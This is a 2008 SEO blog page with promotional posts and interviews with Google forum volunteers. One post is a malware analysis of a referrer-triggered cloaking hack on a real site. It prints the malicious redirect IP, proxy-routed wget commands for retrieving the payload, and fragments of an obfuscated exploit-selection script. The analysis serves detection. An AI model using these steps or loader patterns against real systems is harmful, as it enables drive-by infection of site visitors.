Test Podcast

20 Sep 2008 In: Uncategorized

Test Podcast

Increase conversions, sales optimizing my site, optimization tips

17 Sep 2008 In: Uncategorized

Increase conversions, sales optimizing my site, optimization tipsread more | digg story

Increase conversiosn, sales optiizing my site, optimization tips

15 Sep 2008 In: Uncategorized

Increase conversiosn, sales optiizing my site, optimization tipsread more | digg story

The website hack you’d never find

5 Sep 2008 In: Uncategorized

Warning: do not try the URLs here unless your system is locked down properly. I suggest using a “virual machine” (I use VMware) to test things like this. The hack itself is complicated, the system is simple - skip the complicated part if you’re in a hurry.

It all started with a posting like this:

When I do a google search for [hide]Jonathan Wentworth Associates[/hide] the first result is:

[hide]Jonathan Wentworth Associates, LTD[/hide]
[hide]Welcome to Jonathan Wentworth Associates, a respected resource for world-class orchestral soloists,
conductors, opera, chamber music, chamber orchestras, …[/hide]
[hide]www.jwentworth.com/[/hide] - 19k - Cached - Similar pages - Note this

The: [hide]Jonathan Wentworth Associates, LTD[/hide] is highlighted and is a link to the web site. If you place the mouse over the link, it shows [hide]http://www.jwentworth.com[/hide]. However, if you click the link it immeately attempts to download the trojan. My McAfee immediatly blocked it.

Looking at the page in question, it doesn’t appear to be hacked, it doesn’t appear to have any kind of scripts injected, etc. However, using LiveHTTPHeaders with Firefox, while doing the same steps (search, click on the top result) you see the following:

GET / HTTP/1.1
Host: [hide]www.jwentworth.com[/hide]
HTTP/1.x 302 Found
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Location: [hide]http://www.jwentworth.com/[/hide]

Without going through Google, the page is returned right away, just like it should. Search engine crawlers also get it like that. After the step through Google however, the site does a 302 redirect to some IP-Address and then returns to the original site. The average browser won’t see that, but if you’re quick you might spot it in the status-bar. A search engine crawler or any user who knew the address would get there without a redirect and not notice a thing.

Strange.

That’s something that deserves to be looked at more closely. What’s on that server? How could I be able to see it?

I had seen something similar a few months back which redirected me to an affiliate site the first time I went to that site through a Google referrer (in my case, the gmail.google.com referrer was enough). It would only trigger once per IP-Address. This looks like a similar hack.

When I was able to download the files, I had a nice collection of:

  • an encrypted javascript file that downloaded exploits based on browser and operating system
  • an exploit from free-spy-cam.net
  • an affiliate sales page for an antivirus software. Oh the irony. “We just infected you, buy our antivirus to get clean.” That is, if that software isn’t infected with something else.
  • an affiliate signup link on that page

A search engine crawler will never see these things. A user, coming in from Google, will get redirected and if the IP address is not known, it will trigger a few exploits based on the system the user has and then display an affiliate ad page. The next time the user comes, the redirect will happen but the normal page will be shown.

Spotting the hack on your site

It would be good to know how you could spot a hack like this on your site. In general, you wouldn’t be able to. You can check for this particular hack, but it might not trigger every time … not to mention that there are likely way too many hacks that you would need to check for.

A simple way to check for it would be to use wget to access the page, and check for strange redirects, eg:

>wget –user-agent Firefox –save-headers –referer “http://www.google.com/search?q=duuude” “http://www.jwentworth.com/”

However, as mentioned, that might not work every time.

The technical details

(skip this part, if you are lost already )

The original spotting of the anomaly was using LiveHTTPHeaders with Firefox, while doing the steps: search, click on the top result. You see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates

HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/
1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/5.0.2.2635.SR1.2 mod_ssl/
2.8.28 OpenSSL/0.9.7a
Location: http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80…
(… added space to prevent linking …)

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Host: 85.255.117.38
(…)
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:05 GMT
(…)
Location: http://www.jwentworth.com/

A strange redirect like that is a really bad sign. How can we check the URL that is given to see what they are sending? Apparently it can only be triggered once per IP-address and I had already used that chance earlier. In order to view the initial page, I had to find an IP address that was not yet registered with the remote server (at least that’s my explanation). I used a proxy server from one of the lists online. Using the proxy server and wget, I was able to access the page:

>set http_proxy=81.63.140.37:3128

>wget –user-agent “Firefox” –save-headers “http://85.255.117.38/ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2Findex%2Ehtml”

Connecting to 81.63.140.37:3128… connected.
Proxy request sent, awaiting response… 200 OK
Length: unspecified [text/html]
20:43:23 (79.20 KB/s) - `ind.htm@src=324&surl=www.jwentworth.com&sport=80&suri=%
2Findex.html.2′ saved [414]

The page that was returned was a normal frameset:

Select code
HTML:

  1. <HTML><HEAD><TITLE></TITLE></HEAD>
  2. <frameset framespacing=“0″ border=“0″ rows=“*,1″ frameborder=“0″>
  3. <frame name=“m” src=“/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt” scrolling=“no” noresize marginwidth=“0″ marginheight=“0″>
  4. <frame name=“b” src=“about:blank” marginwidth=“0″ marginheight=“0″ scrolling=“auto”>
  5. <noframes><BODY>Frames not supported by your browser.</BODY></noframes>
  6. </frameset><body></body></html>

The second frame was kind of funny, “about:blank”? The first one was a bit more interesting though: http://85.255.117.38/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt
Notice the “trk” parameter.

Accessing that page with Opera within a VMware virtual machine running Windows 2000 (heh, paranoid is good), I was able to access that page. I saved it for analysis (and had Ethereal running on the side just to be sure). I tried to refresh and it returned 404. You could only view the page once.

Looking at the files you see some interesting things:

- an encrypted javascript file
- an exploit from free-spy-cam.net
- an affiliate sales page for the antivirus software
- an affiliate signup link on that page

The ZIP-File contains a full copy of the files as downloaded by the Opera browser. Check the files at your own risk, they contain the full exploit.

The encrypted javascript file looks like this (pulled apart and reformatted; called “__cntr000.htm” in the ZIP file):

Select code
JavaScript:

  1. <script language=JavaScript>
  2. function dc(sed) {
  3.   l=sed.length;
  4.   var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,56,60,51,15,9,10,13,36 () 52,16);
  5.   soot=sed;
  6.   for(j=Math.ceil(l/b);j>0;j–) {
  7.      r=;
  8.      for(i=Math.min(l,b);i>0;l–,i–) {
  9.        saam=t[soot.charCodeAt(p++)-48];
  10.        sttp=saam<<s;w|=sttp;
  11. ()
  12.      dd1=“document”;
  13.      dd2=“write(r)”;
  14.      eval(dd1+“.”+dd2)
  15. ()
  16. dc(“AVbFxuGqAk7s5OpH (…) G2ovPVoP9dATq_”)
  17. </script>

The contents of the file are encrypted with some variation of Base64 encoding. You can decode the javascript by replacing:
eval(dd1+”.”+dd2)
with
document.write(”<xmp>” + r + “</xmp>”);

Doing that will display the full contents of the encrypted data (called “__cntr000-decoded.htm” in the ZIP file).

Select code
JavaScript:

  1. ()
  2.   var WinOS=Get_Win_Version(IEversion);
  3.   PatchList = clientInformation.appMinorVersion;
  4.   switch (WinOS)
  5.   {
  6.    case “wXPw”:
  7.     XP_SP2_patched=0;
  8.     FullVersion=clientInformation.appMinorVersion;
  9.     PatchList=FullVersion.split(“;”);
  10.     for (var i=0; i <PatchList.length; i++) { if (PatchList[i]==“SP2″) { XP_SP2_patched=1; } }
  11.     if (XP_SP2_patched==1) { ExploitNumber=9; }
  12. ()
  13.     location.href=“cnte-eshdvvw.htm?trk=zszuyhbinthnpzt”;
  14. ()

It is yet another javascript that triggers an exploit based on the operating system (it even test for XP service pack 2) and browser that the user is using. The exploit is also tagged with the “trk” parameter and couldn’t be downloaded separately. You can bet that’s it’s not a picture of your favorite celebrity, however.

Next steps

You could follow these up with:

  • Checking the whois of the payload-server and notifying the hoster (in this case probable fruitless)
  • Checking the sales page, search for the affiliate ID and the setups running and complain to the affiliate networks about this webmaster
  • Mirror a copy of the original server for analysis
  • Obviously move to a different server, perhaps even a different hoster

Summary

The hacker had managed to patch the server side code (most likely the Apache server) so that
- search engines see the normal page
- new users from search engines are hacked with several exploits and shown an ad for anti-virus software

Spotting something like this on your own sites is close to impossible. The search engine crawlers would not notice anything.

Recognizing something like this algorithmically on Google’s side would be possible with the Googlebar-data. Assuming all shown URLs are recorded, they could compare the URL clicked in the search results with the URL finally shown on the user’s browser (within the frames). At the same time, the setup could be used to detect almost any kind of cloaking.

Scary stuff.

Keyword Density Checker

5 Sep 2008 In: Uncategorized

Great FREE SEO Tools

5 Sep 2008 In: Uncategorized

Have a look at these fantastic SEO tools, they have made my life and legwork for clients SO much more enjoyable.

  • https://adwords.google.com/select/KeywordToolExternal
  • https://adwords.google.com/select/TrafficEstimatorSandbox
  • http://tools.seobook.com/general/keyword/suggestions/

If you are interested, I offer an SEO Audit that tells you very specifically and on a very granular level how your site looks to a Search Engine (SE). Much of what you discover in the SEO Audit you can correct yourself (and usually rather quickly) to appear more attractive to SE’s and improve your Page Pank (PR) and index status (showing up higher on results pages).

Click here to - ask me about getting an SEO Audit for your site!

Interview with Craig “œcass-hacks”

5 Sep 2008 In: Uncategorized

Hi Craig, welcome to my blog ! Craig is, for those that haven’t noticed, an alien from some solar system far away. At least that’s the conclusion I came to after reading his introduction, the overview page on his site and his “my first computer” posts. I’m pretty sure that he’s either alien or very, very creative (as in creative writing), I mean seriously, “I built my own computer when I was 12.“?! Craig has been a frequent contributor in the Google Groups, bringing in a lot of background knowledge, helping with stylesheets, javascript and all sorts of other issues that arrive on a regular schedule.

I know that wasn’t a question but I would like to comment anyway. Although you are not the first to suggest I am not of this world, serious or not, I feel it is not so much a question of identifying the “where”, but identifying the “when”.

I think had I lived 150 to 200 years ago, I wouldn’t seem as much an alien as I do to so many people. More often than not, people who I communicate with over a period of time before ever meeting in person say something similar, I seem odd to them because they try to identify me with a place and fail but after meeting me in person, understand it is not a matter of identifying a place, but a place in time.

Many people are still put off after realizing that but a few people are able to take it in stride. You can tell a lot about a person by how they react to extreme situations and I guess I can be a bit extreme at times.

Someone once called me an “anachronistic anomaly”. That seems to describe me as well as any other description I have heard, at least descriptions appropriate for mixed company.

So Craig, with a brain the size of a planet, I’m sure you have some really smart and cool things to do. What drives you to spend so much time in the Google webmaster help groups?

Good question, as in the best question have no real answers. The closest I think I can come to a real answer though is that I enjoy observing how things work. One of my first memories is of my parents taking me and my two sisters to a zoo where there was a carousel. While my sisters were busy watching the pretty horses, which were just carved and painted wood, I was watching the gears and shafts and cams and wheels looking to see how it all worked.

Later, much later, when I was working with particle accelerators, some the size of 5 story buildings, there would be some sort of problem but one had to have a pretty good idea of what it was because as often seemed the case and as Murphy’s Law would have it, problems usually occurred in the least accessible spot and it could take up to a couple of days just to get to where the problem might be.

If the problem wasn’t there, all that time was wasted. But, it also wasn’t good enough just to know where the problem was, one also had to have an idea of how to fix it and maybe more importantly, how to keep it from happening again and again. All of what went into getting proficient at that was observing what one could of available data from what one could see and then coming up with a reasonable scenario as to what the cause might be where one couldn’t see and then testing that scenario as much as possible before putting any plan into action.

In Google’s Webmaster Tools Help Group, I am able to observe a lot of different situations and the more I see of a given situation, the more I have to go on to try to come up with possible scenarios to understand what may be happening. So I guess what drives me is what has always driven me, a desire to observe and understand.

How did you find the Google Webmaster Help groups in the first place? Looking at your first posts it doesn’t look like you had any particular problem that needed to be solved.

I found the group through the Google Webmaster Tools which I found through the “Add URL” page. I had just launched my first publicly accessible web site and had heard of submitting URLs to the various search engines so I asked “Professor Google” how to do it for the search engines I knew about the most and found what I was looking for. From there, I played with the Webmaster Tools for a very short time which was primarily due to there being no real data to look at when a site is first indexed and then started digging into the help files and was directed to the Groups forum. It was not so much that I was having any particular problem at the time, or since, but more so, someone felt it worthwhile to publish all that information for some reason, not reading it would seem to be a serious waste of both their time and mine.

You are right though, I didn’t have any particular problem nor do I think I would have asked had I one. I have been around long enough on various technical forums and the like to know that there is rarely a question that hasn’t been answered or doesn’t have an answer somewhere although very possibly being “hidden” and in need of being dug for.

On the other hand, I also know that for some questions, there are no answers or at least no answers likely to be forthcoming so before asking too much, I’d want to know what questions are even likely to receive an answer of any use.

But, search engines at that time I had very little experience with, other than as a search user and having already dealt with large amounts of data, it intrigued me as to how one might deal with essentially archiving the entire Internet and more importantly, making that archive available in an intelligent and useful manner. Large amounts of data don’t impress me as I’ve dealt with huge databases of tera and peta-record size but the easy, intelligent and fast access to the contained data is the real challenge.

What was it that grabbed your attention about the web? Why did you decide to put together your own website?

I wouldn’t say I was particularly “grabbed” by the web. It just seemed like a much easier platform to develop applications for. I’ve written in almost every language from machine code to C++ and at one time burning EEPROMs just to be able to test a section of code out. With PHP, Javascript and MySQL, I can whip up an application in a matter of hours. It may and very likely will look like hell but the basic functionality is there, sort of a proof of concept if you will.

As for cass-hacks specifically though, I’d built a lot of toys of various levels of usefulness over a period of time and although any one specific toy may not be all that useful, the processes that go into making them work is always useful because a given toy’s functionality is limited to what it was designed to do as well as a little bit being extensible for other purposes if designed well but the processes that go into making any toy work can be used over and over again to build whatever one can imagine. Also, every language has a lot of very simple syntax that is pretty boring to look at but can become interesting to the point of being exciting when combined in ways one might not originally have thought of.

Although straying a bit from the mark, I think the most interesting project I have documented on my site so far is one that gets the least amount of traffic. That project is a user notification system that is actually “agent” based, i.e. artificial life or as is commonly referred to as artificial intelligence, AI. Many people think that “AI” is some complex rule processor that attempts to simulate intelligent thought but that is only science fiction and pretty much had been given up on many years ago. Most of the work done in this area over the past couple of decades has been “Agent based”, creating simple little entities programmed to do very simple tasks and then releasing them to do what they were programmed to do. Where this ties in with what I have been talking about though is that once I came up with the method of implementing the functionality I wanted to support, it took me all of about 20 minutes to do it using DOM, CSS and Javascript whereas trying to do the same thing in just about any other programming environment would have taken days.

Once you have worked with different technologies, you usually get a grasp for the general problems that could come up when implementing them. What unexpected difficulties did you run into while working on your first site(s)?

This is going to be a boring answer. :-() None.

I guess from my past experience, I do things a little different than many people. I start out with a list of requirements for a given task and then look into the various methods of satisfying the requirements, with all their possible positives and minuses and then choose the available “tools” that allow me to do the most with the least. By the time I actually get to building something, it is sort of boring because then it is most often just a matter of “plugging and chugging”, a phrase I got from a Calculus professor in the past which basically means, set up the equations, plug in the variable data and then chug through the calculations. Once you got to the “Plug and Chug” stage, it was all pretty much done.

If you came to a situation where you absolutely had to get a website to rank high for competitive terms, which methods would you apply first?

Probably the first thing I would do is go out and hire an SEO. :-) Sorry, boring answer. OK, first, I’d have some limitations on whether or not I even attempted it in the first place. I’d have to be interested in and/or have some experience in the subject matter because getting different sites to rank well is not the same for all sites. Second, I’d take a look at what the past experience of the site has been and how it is doing currently and then I’d look at what are the short term and long term goals. I guess what all that means is that getting a website to rank high for competitive terms only, is a waste of time, energy and money.

But, if I didn’t care about all that and had someone else’s money to waste, I’d first make sure the site/page was even capable of ranking for the terms in the first place by making sure the terms even existed on any of the pages. Then I’d make sure there was as much information from as many different directions as possible on the subject of the target terms and then I’d work to get enough links to the site as necessary so as to make sure the page(s) was(were) even available for searches in the first place.

What I can’t do though is make people search for the targeted terms. So many people talk about wanting to rank well for this that and the other thing but so often is the case, no one is really searching for what is being targeted. I know some people use keyword generators to find out what people are searching for but I also feel that people who then decide what content to put on their site based solely on what will gain the most traffic are doing a disservice to both themselves as well as their potential visitors.

You seem to have seen a lot of corporate environments and worked in a lot of groups, is there anything about Google that was completely unexpected to you?

I feel another boring answer coming on. No, not really. Google, like all companies, is made up of people. Companies may have their policies but it is people that put them into action. A company could have the most negative policies in the world but due to the people in its employ, the company is seen in a much more positive light than a company that may have the most altruistic policies in the world with assholes implementing them.

Google seems to be the best of both worlds though, company policies seeming to tend toward ensuring equality for all involved with people implementing them that also seem genuinely concerned about the people they actually serve, the users of their various products and services. Were it not the case, I wouldn’t be sticking around because it wouldn’t make sense supporting someone else in being an asshole when I can enjoy being a much bigger one all by myself, why share? On the other hand, when I see a situation, much like with Google, where many people feel the need to view Google as evil or have ulterior motives where having any would be counterproductive, if I can in any way help someone to possibly see the other side of things, I feel I have done some good.

Were it not the case of Google being a basically positive company with obviously positive people working for it, there wouldn’t be so many of them out there putting themselves in the public eye and speaking as much for themselves as they do in efforts to try to explain as much as they can about the company they work for and with.

Turning the tables on Google, assume you had full access to everything and all the help that you needed, what would you change?

It wouldn’t really be a matter of “turning the tables” and although I definitely feel another boring answer coming on, I don’t know enough about what goes on internally to want to change anything. How could I know that what I wanted to change wouldn’t actually make things worse unless I knew why what I wanted to change was the way it was in the first place?

On the other hand, were I to have the opportunity, I would like to improve on some things, mainly things that I have been exposed to. I’d love to revamp the Webmaster tools and make them more timely and informative to the extent possible. Getting rid of tools that are of little use while expanding on others that may seem of little use but could be much more valuable if the data they offered was expanded and made more accessible to searching through. Also, I’d love to rewrite the Google Groups application as it seems to have the worst of all possible worlds.

Its use of Javascript, has to be about the most counterproductive as I have ever seen. There are also a number of things that could be done using Javascript, but aren’t currently, that could make the Groups much easier to use. About the only thing the Groups application has gotten right, in my opinion, is making it so that the functions of the Groups application work with Javascript enabled or disabled, which is actually a big accomplishment considering so many of the Javascript applications similar to it don’t work at all without Javascript.

Also, and I don’t know how much can be done in this area as I don’t know how it is currently implemented but one thing I would like to tackle would be improving the reliability of the various functions of the Groups application as it gets downright discouraging to use more often than I would like any application I was responsible for to be.

Is there anything more you’d like to add at the moment?

Other than thanking you for what has been my first interview in a LOOOOONNNNNGGGG time, I can’t think of anything I’d like to add.

Thanks for your time, Craig!

Although I’ve had a feeling this interview was coming, and dreading it, it wasn’t as painful as I thought so I thank you for making the process not too terribly intolerable!

Interview with Matt / “œDockarl”

5 Sep 2008 In: Uncategorized

Hi “Doc”, it’s cool to have you here! It’s great that the web removes barriers like the physical distance from here in Switzerland to Australia. Matt has been one of the regular contributors to the Google Webmaster Help Groups since January 2007. He has a diverse background: Agriculture and Computers, an interesting mixture, or how he puts it in his profile: “I know about cows and computers” :-).

Looking at your first posts, I see a desperate webmaster, someone even screaming for “HELP!!!” in the thread titles. How did you find the Google Webmaster Help groups and what made you decide to originally post about your problems there?

Hmm.. how did I find the groups - I think I might have searched “How to contact Google” and came across the webmaster help groups there. I had to - I’d come across a problem that I just couldn’t get an answer to by doing a regular Google search, I knew it was an unusual problem and, like many other webmasters, I figured I might be able to find a real, living, breathing Googler somewhere to talk about the problem.

Did you get a satisfactory answer to your original questions in the groups? What elements were vital to that outcome?

Well, for some reason the answers to that post (it was back in 2006) have been ‘lost in the system’ but I did get a lot of hypotheticals from the regular group members - but nothing that helped, unfortunately.

How that came about is a very long story, but hell, you’ve asked, so I’ll tell you :-). The person who owned the intellectual property we had been laboring to develop for the last two years had turned nasty - and was annoyed that we used their name on our website (and outranked them for it). My business partner and I were receiving ~20+ calls a day between us from the person. The phone calls started to elevate to the extent that we considered them threatening, and we were forced to call the police.

In the wash-up we just decided that - as a family business - we weren’t prepared to have to explain to my business partners kids (both under 5) why mum was crying and the police were ‘coming for a visit’ on a Saturday morning - so we decided to remove the name in question to stop further stress, even though we had every right to use it.

So I took the quickest path possible, made the changes to the website and asked Google to remove the cache. It had unintended consequences - it totally removed the ’snippets’ from our website (our listings were title only), and we were left with a huge traffic decline. This, on top of everything else was absolutely crippling to the business. So, by the time I posted here I was getting a bit desperate - and it’s one reason I’m generally patient with people that come to the groups angry.

In the end, unfortunately no one here could give me the answer to the problem - it was out of their control. I hadn’t realized that a cache removal would remain in effect for 6 months. The main element that was vital to my outcome was Vanessa Fox (the beaut person that she is) who saw my post and stepped in and tweaked the system to let my site back in.

You’re a webmaster, you had issues with your site and Google and posted in the groups. If a webmaster came up to you and asked if it would be worthwhile to post about his problems there, what would you tell them? Would it make any difference if the webmaster was new to webmastering?

That’s an easy question. We’ve got a great community of beaut people here - you just don’t spend hours helping people gratis unless you’re passionate about it, so we tend to be universally ‘nice’ to people, especially newbies. I’d say ‘Go ahead, write your question, try to be succinct about it and TRY NOT TO PANIC!’. I’d also make sure that they knew that the people helping would more than likely be knowledgeable volunteers, so make sure you check your frustration at the door

What was it that made you stick around in the Google Groups, not only to ask more questions but also to help answer other people’s questions? What makes the Groups special compared to other forums?

Well I think that JLH and yourself made the effort to email me and help with some problems I was having with a hobby site of mine called ‘utheguru’ - that was an awesome gesture and made me feel at home. That kind of thing, along with the occasional guest post by a Googler, is what makes this forum special

In parallel to that, things had degenerated a lot further with our business to the extent that lawyers had become involved, and I had to put my PhD (and hence, income) on hold to spend my time dealing with that. I was looking for a stress release, and I’ve always been the kind of person that finds learning natural, cathartic and relaxing - so I got hooked.

If I’m honest, I also figured it was a way I could work towards another goal of mine - working with Google.

As an undergrad student, I read Page and Brin’s paper, and thought - “wow, that’s a neat idea”. The whole concept of Pagerank and linkages is something that’s really been around in science for hundreds of years. A good scientific paper is one that references other authors widely, and a reputable scientist is one that has papers referenced by many others. The CONCEPT of Pagerank is really nothing new in science - it just took a neat idea by those two fellows to convert the concept into something that could transcend academia and become relevant to that new thing called ‘the Internet’. Google became popular, first, amongst scientists - that’s something I observed and there was certainly alot of buzz about it within that sector of society before it ever became the household name it is now.

I’ve been a Google user ever since, and I’m fascinated by the system itself, how it works, the company, the culture - everything about Google appeals to me.

Further to the reasons Google fascinates me (you didn’t ask but I’m gonna tell you anyway.. haha), before the rather wild ride of backless lingerie began, I’d worked for some time as a Scientist with the Sugar industry (especially on the field / mechanisation side), and one of the major things I worked on there was reward algorithms - trying to use disparate manufacturing measures at the mill end of the system to send ‘quality’ signals to harvester operators. Hmmm.. how do I explain this - well, I’ve gotta go into a little background detail…

Sugarcane harvesters chop up cane into little lengths, about 8 inches long, called billets. Along with the cane, the leaf material is also chopped up. If that leaf material reaches the mill, it can have a bad affect on the quality of the sugar produced, and it also makes the cane more expensive to process and transport. So, the harvesting machines have big 6 foot metal fans which rotate at about 1000 rpm - that’s a phenomenal tip speed. These fans sit above the cane right after it’s been chopped, and their aim is to remove the leaf material. Unfortunately, a whole complex set of interactions conspire to result in a situation where if you try ‘too hard’ to remove the leaf material, you also end up losing about 20% of the cane you harvest through those fans - but it’s invisible. A billet that’s gone through an extractor fan ends up looking something like dessicated coconut - and there is no way of knowing the losses exist unless you do scientific trials to prove it.

I’d done the trials - all through North Queensland, in Papua New Guinea - all over the place. We had proved the losses existed, and the cost to the industry was in the billions of dollars per year, let alone the environmental impact. But because you can’t actually SEE the losses, you have a hard time convincing people that they actually exist. We got to the stage where my team and I had convinced the industry that there was a serious problem, and the next step was obviously “How do we stop it”. We knew that there was a ’sweet spot’ where those losses could be reduced to around 5% depending upon the way the harvester was operated. Since we didn’t have the ability to measure what was happening in the field on a real time basis, we had no choice but to use indirect measurements in the mill - like fibre, the sweetness of the cane etc, to try and infer what was happening in the field - to measure ‘quality’ of the job.

That became my focus, and I learnt along the way that when you’re trying to make a reward system based upon derived measures, the tiniest little change to your algorithm can have huge impacts upon the system you’re trying to model. Also, if you’re offering “rewards” based upon indirect measurements, you actually end up becoming an intrinsic part of the system you’re trying to model - in clearer terms, the whole system tends to change or adapt to maximize “profits”, which can play havoc with the “accuracy” of your algorithm.

It sounds completely unrelated, but that’s actually Google (and the spam struggle) in a nutshell. That’s one of the reasons I’m fascinated with it and feel at home here in the groups where occasionally we get questions that make me think quite deeply about the challenges Google must face - and we get the opportunity to debate our views This thread about pagerank where Craig and I duked it out with full respect for each others opinion is one example I can think of that I’ve enjoyed.

You studied Agriculture and set up a shop to make and sell backless lingerie. I bet all the guys in the groups have visited your full site (for SEO reasons, I’m sure ). How did that ever come about?

Ha - not only did I study Ag, but I managed to convince the government here to award me a scholarship to do a coursework Master’s degree in Computer and Comms engineering. I ended up with a few awards and an aggregate score of over 93% - without an undergrad engineering degree - I think that surprised everyone, even me :-). But I guess it’s only natural - most people do best when they’re doing something they love. I’ve always been fascinated with those applications where IT, Engineering and Science intersect and meet ‘the real world’ - that’s kind of Googly.

An example - I can remember the time when I was about 12 years old that I blew up the family commodore 64 trying to get it to drive solenoids to water the garden for Mum. I didn’t realise at the time that you need a transistor and a relay if you want to drive something hefty like a solenoid with a TTL output

But apart from being a bit of a terror, I’ve also always been a traveler and got along easily with folks. As such, when I was writing my Masters thesis, I figured I’d go stay with some mates overseas - I had a load of frequent flyer points I wanted to use, they all offered to put me up for free, so I figured it was an opportunity too good to miss. The only ‘gotcha’ was that I was to provide the beer - Norway was a hoot - my oh my - the Vikings ARE NOT dead!

I ended up (between parties) writing most of my Master’s degree tapping away on my laptop, perched on the edge of a fjord whilst staying with my Norwegian Marine Biologist friend in Northern Norway for a few months mid 2005 - the 24 hour sunlight was GREAT.

On the way back I dropped in to see my Indian mate in Tirupur (the south of India, in a state called Tamil Nadu) and ended up spending a few months there too. Tirupur is a big textile producing area, and I made friends with some of the big players there.

When I finally arrived back in Australia I mentioned that to my Brother in Law (a solicitor) and he said “well, I’ve got some clients that are looking to manufacture a neat new product they’ve developed” - so, before I knew it, I was off to India where I learnt all about ladies underwear, mobilon and thread density. We quickly got a few test shipments under our belt.

Upon returning my brother and I were asked if we’d like to get more deeply involved with the sale and promotion of the product - somehow I let myself be convinced. There began the roller coaster ride - I became manufacturer (traveled to China as well for that part several times), web developer, email wrangler, undy packer, book keeper, promoter and media spokesperson. It was crazy work and it was unpaid - the cost of manufacture and promotion sucked away much of my savings and any profit the product brought in before it ever had a chance to reach my pocket - although attending the modeling shoots was fun, and the POSSIBILITY that it might become something big was intoxicating!

But - a word from the wise - ever heard of Ali Baba and the 40 Thieves? Those folk were in the rag trade Get involved at your peril.

One of your sites has recently had a strange kind of trouble with Google’s index, with all sorts of possible explanations but no resolution so far. For the average webmaster these kinds of situations are incomprehensible and terribly frustrating. What would you tell the webmaster when stuck in a rut like that - keep working on the problem or let it sit for a while?

First I’d ask them to think about whether they’d made any big changes to their site recently - to try and hone in on whether it might be something they’d caused themselves, rather than anything algorithmic.

Next, if I’d decided it might indeed be a penalty, I’d usually give them a copy of the webmaster guidelines and say “What do you think it might be?” - people usually have a fairly good idea about what they might have done wrong if a potential penalty is involved. I’d then ask them to write out a list of potential issues, and correct them + submit a reconsideration request and wait a month. If that didn’t work, time to put on the “mad scientist” hat and get methodical about things.

First I’d probably use Google to do a search for other people experiencing the problem. From there I’d approach these groups. If that drew blanks, I’d then start tweaking things with their site - but softly softly - one change at a time, waiting at least a week between changes so that I’d have a fair idea what ‘the cure’ was for future reference.

If that didn’t work I’d probably just start to assume that they were the victim of Google collateral damage - hell, we all know it happens, and I’d be submitting some attention grabbing posts to this group to try and ‘elevate it’ to the attention of Googlers, so that they could use their gadgetry to try and work out what the story was.

At that stage things are out of your hands, and you just hope that perhaps you’ve alerted Google to a potential “Googlebug” that might stop others from experiencing the same kinds of issues.

Assuming you had full access to Google’s servers and some web designers + programmers to help you, what would you change?

Hmmm.. looking back through my prep notes for my Google interview here…

I think I’d start with the problem of penalties. I’d be sitting down with the alg team and trying to thrash out a way that we could actually help those ‘ma and pa’ webmasters that have accidentally shot themselves in the foot - and to do so without giving the spammers a leg up.

I’d write out a list of things that we considered ‘top secret’ and another of those factors that were ‘out of the bag’, and I’d set about implementing changes to Google webmaster tools to alert folks to little things - like obviously hidden text - that might be resulting in a penalty and which they might not know about. Those kind of issues, to my mind anyway, are already well known amongst spammers and you can’t lose much by letting people know about them.

As for the more complex things, like, for example, keyword density (it’s a simple one, I know, but let’s start there) - you know, things that aren’t black or white - things where there were shades of grey, I’d be making tools to show them which side of the line they are tending towards - like a gauge, or traffic lights.

“We think your site is looking a little spammy - here’s an orange alert”.

Naturally, the alg team would then say to me “Well Matt, that’s all well and good, but if we start giving folks that kind of info, we’re essentially giving the spammers a great tool which they can use to test the limits of our alg, too”. I’d then say to them, well, why don’t we use cluster analysis to break sites down into 100 different categories of ’spamminess’ - the traffic lights would just show how spammy you are relative to others in your ’spamminess cluster’ - so really, if we give a green light to a known spammer, all we are telling him is that he’s kind of ok compared to the other spammers within his uber spammer group - but he needn’t know that

For the spammers, the lights system would achieve nothing. For the ma’s and pa’s that are relatively innocuous, having a red light could be a huge help - just knowing you have a penalty lets you know that it’s actually something you can track down and correct.

But I suspect the other engineers would raise a whole load of reasons that my approach wouldn’t work - but I love the dynamics of a group, and part of the enjoyment of working in one is often the synergy that you find when you’re sitting down with a whole bunch of folks with common interests and intellect thrashing out a new idea - that’s how a lump of coal turns into a diamond.

That would be a plum position to be in.

After that I’d probably start gravitating towards the alg design / testing side of things - as that’s something I’m fascinated with - setting up mega test networks and conducting sensitivity analysis and pre-testing of new algorithm ideas would be lots of fun and extraordinarily satisfying - I love taking good ideas and helping make them better.

I’ve also thought I’d like to make a tool that shows a graphical representation of the linking structure of a site - with things like nofollow, noindex as an overlay - that could be a great troubleshooting tool for lots of problems too.

But, to be honest, most of my programming experience is at the nuts and bolts level - A GUI to me is a command line and a prompt - I’ve got a lot of engineer in me. I’d be able to write the crawlers and mangle the database, but I’d have to leave the bells and whistles to someone else :-)

You’ve done a lot of different things (so far, including an interview with Google). If you could rewind back to when you started studying, do you think you would do anything differently knowing what you know now (other than obviously buying some good stock)?

Cool! A rewind button!

Firstly, I wouldn’t have flown Qantas to my big interview - it was a debacle start to finish - they lost my bags (clothes, books, notes) my flights out (and back) were both delayed 12 hours or more and diverted because of tech probs - in short, I arrived sleep deprived and not feeling prepared, and I think I only hit my feet during the interview just after lunch. It was like an out-of-body experience.. grrr….

Secondly - I wouldn’t have studied Agriculture.

We had loads of fun out there, but my natural aptitudes are IT / Science / Engineering. My ag degree included a lot of that, but I tended to get let down by the sheer boredom of prac sessions that included watching grass grow - honestly.

I’m the kind of person that thrives on a challenge - so I did poorly at the “watching grass grow” practical subjects, and tended to dux the more academic subjects that others found a tad difficult - like advanced stats, biometry etc - I did the wrong degree for my skillset and, like it or not, time is a depreciating commodity.

